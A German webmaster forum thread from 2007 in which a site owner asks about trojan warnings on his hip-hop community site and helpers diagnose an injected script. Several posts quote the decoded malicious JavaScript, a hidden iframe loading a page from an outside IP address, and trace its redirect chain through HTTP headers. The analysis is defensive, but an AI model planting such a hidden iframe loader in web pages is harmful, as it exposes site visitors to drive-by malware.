1. Dashboard
  2. Artikel
  3. Mitglieder
    1. Letzte Aktivitäten
    2. Benutzer online
    3. Team
    4. Mitgliedersuche
  4. Forum
    1. Unerledigte Themen
  • Anmelden
  • Registrieren
  • Suche
Dieses Thema
  • Alles
  • Dieses Thema
  • Dieses Forum
  • Artikel
  • Seiten
  • Forum
  • Erweiterte Suche
  1. HTML - Webmaster Forum
  2. HTML / Webmaster Forum
  3. Webanwendungen - Webapplikationen

Trojaner Warnung

  • w.white
  • 17. Dezember 2007 um 16:22
1. offizieller Beitrag
  • w.white
    Interessierte/r
    Beiträge
    120
    • 17. Dezember 2007 um 16:22
    • #1

    Ich habe momentan ein Problem, beim Klick auf meine Seite -> http://www.RapSpot.de kommen vereinzelt Trojaner Meldungen vor. Dies wird natürlich kein echter Trojaner sein sondern nur irgendeine Stelle die als Trojaner indentifiziert wird. Wie kann ich verhindern das selbiges als trojaner erkannt wird? Wirkt halt recht unseriös wenn man gleich eine Trojaner Warnung bekommt.

    www.RapSpot.de - Deine Hip Hop Community im Netz

  • JJAANN
    Meister(in)
    Beiträge
    390
    • 18. Dezember 2007 um 14:39
    • #2

    vieleicht hat irgendjemand einen Trojaner auf dein Forum gezogen und es ist eine echte Trojaner warnung

    http://www.image-check.net << Dein kostenloser Images Hoster. Auch ohne Anmeldung

  • Walerik
    Samurai
    Beiträge
    174
    • 18. Dezember 2007 um 16:03
    • #3

    nutzt du evtl. kaspersky???

    [Blockierte Grafik: http://media.pennergame.de/cache/signaturen/828285.jpg]

  • w.white
    Interessierte/r
    Beiträge
    120
    • 18. Dezember 2007 um 19:41
    • #4

    Nein, Ich hab die Warnung ya auch nicht! Mir wurde es lediglich berichtet.

    www.RapSpot.de - Deine Hip Hop Community im Netz

  • Walerik
    Samurai
    Beiträge
    174
    • 18. Dezember 2007 um 19:43
    • #5

    hab gehört das da kaspersky falschen alarm ausspuckt aber auf die aussage würd ich mich nicht verlassen soll aber ein Trojan-Clicker.JS.Agent.h sein

    [Blockierte Grafik: http://media.pennergame.de/cache/signaturen/828285.jpg]

  • admin
    Administrator
    Reaktionen
    6
    Artikel
    1
    Beiträge
    12.794
    • 18. Dezember 2007 um 20:24
    • Offizieller Beitrag
    • #6

    Bei mir kommt auch die Warumg > Trojan-Clicker.JS.Agent.h >

    http://www.viruslist.com/de/search?VN=T…t.h&referer=kis

  • w.white
    Interessierte/r
    Beiträge
    120
    • 19. Dezember 2007 um 20:10
    • #7

    Will sich dem vllt. jemand privat annehmen und mal meinen Server auf Trojaner durchsuchen und diese Ausräuchern? :wink: Wär cool wenn das jemand machen würde.

    MfG w.white

    www.RapSpot.de - Deine Hip Hop Community im Netz

  • Walerik
    Samurai
    Beiträge
    174
    • 20. Dezember 2007 um 06:24
    • #8

    pste doch mal den quelltext

    [Blockierte Grafik: http://media.pennergame.de/cache/signaturen/828285.jpg]

  • K.Y.L.T.
    König(in)
    Beiträge
    1.015
    • 21. Dezember 2007 um 10:57
    • #9

    Klar räum ich deinen Server mal auf , poste doch bitte einmal ip und deinen rootzugriff :lol:

    Sämtlicher Code erhebt keinen Anspruch auf syntaktische Korrektheit geschweige denn Ausführbarkeit und ist für die Implementation außerhalb der Beispiele nicht geeignet.
    [Blockierte Grafik: http://www.snippr.de/social/img/logo.png]
    Kein Support für kommerzielle Scripts | Kein kostenloser Support via ICQ

  • sudeki05
    König(in)
    Reaktionen
    1
    Beiträge
    1.435
    • 21. Dezember 2007 um 12:23
    • #10

    Poste dein QT und dann sehen wir weiter.

    [Blockierte Grafik: http://www.publicons.de/my/pub__163,858,892,308_2.png]
    Problems with Windows? - Reboot
    Problems with UNIX? - Be Root

  • w.white
    Interessierte/r
    Beiträge
    120
    • 21. Dezember 2007 um 20:30
    • #11

    Der Quelltext der index.html?

    www.RapSpot.de - Deine Hip Hop Community im Netz

  • sudeki05
    König(in)
    Reaktionen
    1
    Beiträge
    1.435
    • 21. Dezember 2007 um 20:31
    • #12

    Ja genau, der QT ;) aber der index.html die grade online ist!

    [Blockierte Grafik: http://www.publicons.de/my/pub__163,858,892,308_2.png]
    Problems with Windows? - Reboot
    Problems with UNIX? - Be Root

  • w.white
    Interessierte/r
    Beiträge
    120
    • 22. Dezember 2007 um 09:58
    • #13

    Machen wirs so:

    Quelltext als .txt

    EDIT: Beim anschauen hab ich was entdeckt am anfang gleich beim body Element. Das kommt aber immer wieder wie kann ich verhindern das das wieder auftritt?

    www.RapSpot.de - Deine Hip Hop Community im Netz

  • sudeki05
    König(in)
    Reaktionen
    1
    Beiträge
    1.435
    • 22. Dezember 2007 um 11:56
    • #14

    Poste dein QUELLCODE, keine Datei... ;)
    am besten die ganze index.html löschen und ein backup draufspielen, welches nicht infiziert ist..

    [Blockierte Grafik: http://www.publicons.de/my/pub__163,858,892,308_2.png]
    Problems with Windows? - Reboot
    Problems with UNIX? - Be Root

  • DarkSyranus
    Shogun
    Beiträge
    3.446
    • 22. Dezember 2007 um 11:59
    • #15

    Also ich hab mal ein wenig durchgeguckt.

    Was macht der JS-Code da?
    Der Code in deiner Index ist verschlüsselt.
    Entschlüsselt steht folgendes da.

    Code
    <SCRIPT>
    window.status='Done';
    document.write('<iframe name=cbc4738199a src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*273890)+'8f71611b\' width=610 height=449 style=\'display: none\'></iframe>')</SCRIPT>

    Das heißt also, dass ein iFrame erzeugt wird.
    Nun zu der iFrame Zielseite.
    Die ist insgesamt ein wenig zufällig, allerdings kommt was ähnliches wie http://77.221.133.188/.if/go.html?1378768f71611b dabei raus.

    Nun zu dieser Seite

    Zitat

    Forbidden

    You don't have permission to access /.if/go.html on this server.


    Netter Trick, stimmt aber nicht so ganz, denn im Source finden wir folgendes.

    Zitat

    <iframe src="http://77.221.133.188/.dif/go.php?sid=1" style="border:0px solid gray;" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

    Also ab zu der nächstens Seite.
    Die leitet leider zu yahoo um, aber ist nicht ganz so unschuldig.
    Wenn man sich den HTTP-Code anguckt, den die Server senden erhält man folgendes.

    Zitat

    http://77.221.133.188/.dif/go.php?sid=1


    GET /.dif/go.php?sid=1 HTTP/1.1

    Host: 77.221.133.188

    User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11

    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

    Accept-Language: de,en-us;q=0.7,en;q=0.3

    Accept-Encoding: gzip,deflate

    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

    Keep-Alive: 300

    Connection: keep-alive


    HTTP/1.x 302 Found

    Server: nginx/0.5.31

    Date: Sat, 22 Dec 2007 13:48:44 GMT

    Content-Type: text/html

    Connection: keep-alive

    Keep-Alive: timeout=20

    X-Powered-By: PHP/5.1.6

    Location: http://77.221.133.189/.sp/in.cgi?p=e

    Content-Length: 0

    Alles anzeigen

    Interessant ist an diesem Code nur folgendes

    Zitat

    Location: http://77.221.133.189/.sp/in.cgi?p=e

    Das heisst, dass diese Seite automatisch auf http://77.221.133.189/.sp/in.cgi?p=e umleitet.
    Nun näher dazu. Auch diese Seite leitet weiter.

    Zitat

    HTTP/1.x 302 Found

    Server: nginx/0.5.31

    Date: Sat, 22 Dec 2007 13:51:21 GMT

    Content-Type: text/html; charset=iso-8859-1

    Connection: keep-alive

    Keep-Alive: timeout=20

    Location: http://www.yahoo.com

    Content-Length: 204

    Alles anzeigen

    Interessant ist aber, dass Content-Length nicht 0 ist, also wird auch HTML o.ä. an den Clienten geschickt.

    Zitat

    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>302 Found</title>
    </head><body>
    <h1>Found</h1>


    The document has moved here.</p>
    </body></html>

    Alles anzeigen

    Also entweder habe ich was übersehen, oder es werden nur 2 iFrames mit dem Ziel Yahoo erstellt ;)

    [Blockierte Grafik: http://img28.imageshack.us/img28/7551/anleitungt.jpg]

  • w.white
    Interessierte/r
    Beiträge
    120
    • 22. Dezember 2007 um 18:43
    • #16
    Zitat von sudeki05

    Poste dein QUELLCODE, keine Datei... ;)
    am besten die ganze index.html löschen und ein backup draufspielen, welches nicht infiziert ist..

    Was glaubst du warum ichs als .txt hochgeladen hab :roll:

    @ DarkSyranus

    Was soll ich jetzt tun?

    www.RapSpot.de - Deine Hip Hop Community im Netz

  • ich303
    Prinz(essin)
    Beiträge
    702
    • 22. Dezember 2007 um 19:36
    • #17

    hehe mein kaspersky schlägt bei der text dastei sofort an^^

    Beim ersten Schrei, waren Wir alle Nackt!

  • sudeki05
    König(in)
    Reaktionen
    1
    Beiträge
    1.435
    • 22. Dezember 2007 um 19:41
    • #18
    Zitat von w.white

    Was glaubst du warum ichs als .txt hochgeladen hab :roll:

    @ DarkSyranus

    Was soll ich jetzt tun?

    Eine .txt - DATEI angehängt ;) Du solltest das ganze schon richtig lesen...

    Ähm... und wäre wohl angebracht, dann diesen JS-Code zu entfernen, wenn er nicht gewollt ist...

    Code
    <SCRIPT>
    window.status='Done';
    document.write('<iframe name=cbc4738199a src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*273890)+'8f71611b\' width=610 height=449 style=\'display: none\'></iframe>')</SCRIPT>

    [Blockierte Grafik: http://www.publicons.de/my/pub__163,858,892,308_2.png]
    Problems with Windows? - Reboot
    Problems with UNIX? - Be Root

  • w.white
    Interessierte/r
    Beiträge
    120
    • 22. Dezember 2007 um 21:23
    • #19
    Zitat von sudeki05

    Eine .txt - DATEI angehängt ;) Du solltest das ganze schon richtig lesen...

    Ähm... und wäre wohl angebracht, dann diesen JS-Code zu entfernen, wenn er nicht gewollt ist...

    Code
    <SCRIPT>
    window.status='Done';
    document.write('<iframe name=cbc4738199a src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*273890)+'8f71611b\' width=610 height=449 style=\'display: none\'></iframe>')</SCRIPT>

    ist er nicht aber wenn ich ihn lösche dann kommt ein neuer (anderer) wie es schon 2 mal passiert ist.

    www.RapSpot.de - Deine Hip Hop Community im Netz

  • Greg10
    Prinz(essin)
    Beiträge
    825
    • 22. Dezember 2007 um 22:48
    • #20

    arbeitest du mit nem WYSIWYG?
    Die machen sowas manchmal.
    Ansonten würd ich mir ernsthafte sorgen um die server-sicherheit machen.

    Orthografie und Grammatik in diesem Beitrag sind frei erfunden und eine eventuell gefundene Übereinstimmung mit einer lebenden oder toten Sprache sollte von allen Beteiligten unverzüglich ignoriert werden.

    K-Progs (In bearbeitung)
    Der inoffizielle Forum-hilfe IRC-Channel
    (Server: irc.freenode.net ; Channel: #forum-hilfe) (Client für FF)
    Ich hab auch 'n Jabber-Account beim CCC ;)

Tags

  • www
  • html
  • server
  • http
  • style
  • body
  • text
  • yahoo
  • code
  • php
  • border
  • script
  • search
  • utf-8
  • iframe
  • xml
  • js
  • linux
  • xhtml
  • agent
  • referer
  • ubuntu
  • age

Benutzer online in diesem Thema

  • 1 Besucher
  1. Datenschutzerklärung
  2. Impressum
Community-Software: WoltLab Suite™